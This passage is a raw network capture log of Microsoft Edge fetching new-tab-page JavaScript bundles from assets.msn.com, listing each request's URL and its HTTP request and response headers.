x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:25 GMT
akamai-request-bc: [a=88.221.24.111,b=431590031,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=30, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b98a8f
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/libs_sports-data-service_dist_index_js-_75511.2667a3eb01b6cff31239.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/libs_sports-data-service_dist_index_js-_75511.2667a3eb01b6cff31239.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: YdOuyjSfuMZOlubYnjtQEw==
last-modified: Fri, 16 Dec 2022 21:57:05 GMT
etag: 0x8DADFB078A28C8D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5a98cd65-701e-0077-3d00-142e96000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:25 GMT
akamai-request-bc: [a=88.221.24.111,b=431590278,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b98b86
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/libs_sports-shared-wc_src_sports-card-followicon_index_ts.0170a0bf068874e973f8.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/libs_sports-shared-wc_src_sports-card-followicon_index_ts.0170a0bf068874e973f8.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: Ta7NDX8yBQJmapJF6ziZEg==
last-modified: Fri, 16 Dec 2022 21:57:09 GMT
etag: 0x8DADFB07AED1114
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6e9d56d8-c01e-000c-0db2-13f981000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:25 GMT
akamai-request-bc: [a=88.221.24.111,b=431590397,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b98bfd
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/libs_video-card-plugin-factory_dist_virtualadsplayer_plugin_js.7357acb432e650b6b96c.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/libs_video-card-plugin-factory_dist_virtualadsplayer_plugin_js.7357acb432e650b6b96c.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: We0Q2QiGLEeWUyIBe/MSJQ==
last-modified: Tue, 20 Dec 2022 23:56:07 GMT
etag: 0x8DAE2E5C3339D9E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7fe44e53-801e-00f4-2e47-1904c5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:25 GMT
akamai-request-bc: [a=88.221.24.111,b=431590504,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b98c68
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/libs_video-card-plugin-factory_dist_xandr_XandrAdManager_js.fdec53460ab84a52c542.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/libs_video-card-plugin-factory_dist_xandr_XandrAdManager_js.fdec53460ab84a52c542.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: eBDeMGD9P7b1Hd4dDLQxUA==
last-modified: Tue, 20 Dec 2022 05:42:20 GMT
etag: 0x8DAE24CF63A424A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fcbc650-601e-0052-7a5c-1438af000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:27 GMT
akamai-request-bc: [a=88.221.24.111,b=431592640,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=24, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b994c0
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/linear-view-feed.39a81a2afd7ac24e678d.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/linear-view-feed.39a81a2afd7ac24e678d.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: aa85VznIXOQ+Rl3ZvKMasA==
last-modified: Tue, 20 Dec 2022 05:42:22 GMT
etag: 0x8DAE24CF7B27A61
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 852643c0-f01e-002b-745a-14b9bc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:28 GMT
akamai-request-bc: [a=88.221.24.111,b=431594176,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=39, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b99ac0
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/linked-in-card.c6a5b477a67361873a96.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/linked-in-card.c6a5b477a67361873a96.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: zt5dnTB/Og7D5D6qFs2euA==
last-modified: Tue, 20 Dec 2022 05:42:22 GMT
etag: 0x8DAE24CF76BDEC1
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3466c844-b01e-006b-615d-146aad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:28 GMT
akamai-request-bc: [a=88.221.24.111,b=431594649,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=27, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b99c99
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/locationMarker.c83ae9fa8639d5085677.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/locationMarker.c83ae9fa8639d5085677.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: VfdYt78TfrLbHoruiBJ+oA==
last-modified: Tue, 20 Dec 2022 05:42:21 GMT
etag: 0x8DAE24CF6D0C6E7
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3b6f9b6c-901e-0079-695a-148c8b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:28 GMT
akamai-request-bc: [a=88.221.24.111,b=431595095,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b99e57
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/lottery-card.e3b874a0946e7769ad2e.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/lottery-card.e3b874a0946e7769ad2e.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: GJRt2yGQrxOMv6BaMim0rw==
last-modified: Tue, 20 Dec 2022 05:42:23 GMT
etag: 0x8DAE24CF8259DB7
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fe5e93c-a01e-00f6-085a-1452c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:29 GMT
akamai-request-bc: [a=88.221.24.111,b=431596644,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=31, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9a464
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/marketplace-card-wc.2966ee1ee60fcbf21ee8.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/marketplace-card-wc.2966ee1ee60fcbf21ee8.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: SU4j8Te5KZxC7LyYWdKv6Q==
last-modified: Tue, 20 Dec 2022 23:56:03 GMT
etag: 0x8DAE2E5C0A93351
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 72939642-c01e-00a4-2a38-1b67f6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:30 GMT
akamai-request-bc: [a=88.221.24.111,b=431596893,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=24, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9a55d
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/mobile-app-upsell-floating-btn.5d651bc53a8dbba52f47.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/mobile-app-upsell-floating-btn.5d651bc53a8dbba52f47.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: tDi5CrMdA+KfnFNYT9IWmA==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF4E45A30
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 417f1696-e01e-0076-2e5d-140594000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:32 GMT
akamai-request-bc: [a=88.221.24.111,b=431599870,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=28, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9b0fe
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/mobile-channel-slider.e60642fb977d3dd99f68.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/mobile-channel-slider.e60642fb977d3dd99f68.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: L9RnW8irsqVPi+PdGmbujg==
last-modified: Tue, 20 Dec 2022 05:42:21 GMT
etag: 0x8DAE24CF6E7A6F0
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fe5ea56-a01e-00f6-645a-1452c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:33 GMT
akamai-request-bc: [a=88.221.24.111,b=431601969,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=31, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9b931
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/mobile-story-viewer.9435df4775d653b44785.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/mobile-story-viewer.9435df4775d653b44785.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: d+bXiYyTGIdjUAFeQQugnQ==
last-modified: Fri, 16 Dec 2022 21:57:05 GMT
etag: 0x8DADFB0787F7946
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 75f9ad77-101e-005d-459d-13b1b0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:33 GMT
akamai-request-bc: [a=88.221.24.111,b=431602233,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=27, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9ba39
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/mockConfigs.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 2PbYhKftC6sHG4VCLMBs8w==
last-modified: Tue, 20 Dec 2022 23:56:03 GMT
etag: 0x8DAE2E5C0DD33F8
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 243ada96-801e-0060-80ef-184fba000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 31 Dec 2022 00:06:35 GMT
content-length: 1681
akamai-request-bc: [a=88.221.24.111,b=431603938,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9c0e2
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/mockHeader.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: vj9r9ngyD0yN4aty2tZNVA==
last-modified: Tue, 20 Dec 2022 23:56:06 GMT
etag: 0x8DAE2E5C278CD63
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 26e7e9fc-801e-0024-075d-1730a3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 31 Dec 2022 00:06:35 GMT
content-length: 1071
akamai-request-bc: [a=88.221.24.111,b=431604268,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9c22c
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/msccCookieBanner.62970e876c3e19cf4ba1.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/msccCookieBanner.62970e876c3e19cf4ba1.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: g67SLQRh9TlxIw0O/OLf4w==
last-modified: Fri, 16 Dec 2022 21:57:08 GMT
etag: 0x8DADFB079FB5A61
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 58657721-e01e-004a-409b-13d09c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:36 GMT
akamai-request-bc: [a=88.221.24.111,b=431606160,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9c990
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/native-ad-call-to-action.2a74d2bf16e40627a28a.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/native-ad-call-to-action.2a74d2bf16e40627a28a.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 32P2MZ/bpvkNONaz3cXPMA==
last-modified: Fri, 16 Dec 2022 21:57:06 GMT
etag: 0x8DADFB0794A73C9
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e5df3e03-601e-00fa-1976-13a6d8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:37 GMT
akamai-request-bc: [a=88.221.24.111,b=431606984,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9ccc8
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
